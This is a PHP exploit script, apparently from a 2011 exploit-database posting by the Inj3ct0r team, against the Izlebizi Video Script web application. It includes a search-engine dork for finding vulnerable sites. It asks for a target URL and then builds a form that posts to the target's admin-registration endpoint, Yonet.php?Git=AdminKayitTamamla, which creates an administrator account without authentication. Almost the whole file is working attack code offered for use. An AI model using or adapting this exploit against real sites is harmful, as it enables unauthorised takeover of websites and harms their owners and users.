<?php

error_reporting(0);

# Izlebizi Video Script Add Admin Account Exploit
# Author: ZoRLu / admin@yildirimordulari.com
# Dork: inurl:"index.php?Git=Profil"
# Date: 09/07/2011
# Tested on: PERFECT XP PC1 SP3

/*
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm ZoRLu member from Inj3ct0r Team             1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
*/

echo "Site Adresi / Target : <form method=post action=''>
				   <input name=\"url\" type=\"text\">(<font color=\"red\">*</font>)<br /><br />
				   <input method=postaction='' type=\"submit\" name=\"button\" id=\"button\" value=\"URL gir\"></form>";
$url = $_POST['url'];

if (!empty($url) ) {

echo "
<font size=\"3\" color=\"red\"><b>Admin Kayit Formu</b></font>
<br /><font size=\"1\" color=\"red\">(*) ile belirtilen alanlarin doldurulmasi zorunludur</font>
<br />
<form name=\"form1\" method=\"post\" action=\"$url/Yonet.php?Git=AdminKayitTamamla\">
Admin Adi &nbsp;: <input name=\"adminadi\" type=\"text\">(<font color=\"red\">*</font>)<br /><br />
Sifre &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: <input name=\"sifre\" type=\"password\" id=\"sifre\">(<font color=\"red\">*</font>)<br /><br />
Sifre Tekrar : <input name=\"sifretekrar\" type=\"password\" id=\"sifretekrar\">(<font color=\"red\">*</font>)<br /><br />
Email &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: <input name=\"email\" type=\"text\" id=\"email\">(<font color=\"red\">*</font>)<br /><br />
  <input type=\"submit\" name=\"button\" id=\"button\" value=\"Kayiti Tamamla\">
</form></center>";

}

else {

echo "<font color='red'><b>Aзэрэn Olduрu Adresi Yaz <br>Example :<br> http://google.com <br>yada <br>http://google.com/path";

}

?>